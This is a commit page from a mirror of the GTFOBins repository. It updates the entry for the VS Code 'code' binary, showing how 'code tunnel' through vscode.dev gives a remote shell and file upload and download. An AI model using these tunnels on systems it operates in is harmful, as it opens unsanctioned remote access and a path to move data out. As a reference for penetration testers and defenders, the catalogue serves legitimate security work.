mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
add file-{upload,download}
This commit is contained in:
parent
6803fc5b9d
commit
70d0ff6a74
@ -1,7 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell:
|
||||
- description: It can be used to create a tunnel to vscode.dev, that's accessible from anywhere, allowing to spawn a shell through it.
|
||||
code: |
|
||||
code tunnel
|
||||
- description: |
|
||||
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.
|
||||
|
||||
Select `View \ Terminal` to spawn a shell on remote.
|
||||
code: code tunnel -name 'my-tunnel-name'
|
||||
file-upload:
|
||||
- description: |
|
||||
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.
|
||||
|
||||
In the `Explorer` tab, select `Open Folder`, then right-click on the folder and select `Upload`.
|
||||
|
||||
Select file from the local file browser.
|
||||
code: code tunnel -name 'my-tunnel-name'
|
||||
file-download:
|
||||
- description: |
|
||||
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.
|
||||
|
||||
In the `Explorer` tab, select `Open Folder`, then select a file, right-click and select `Download`.
|
||||
code: code tunnel -name 'my-tunnel-name'
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user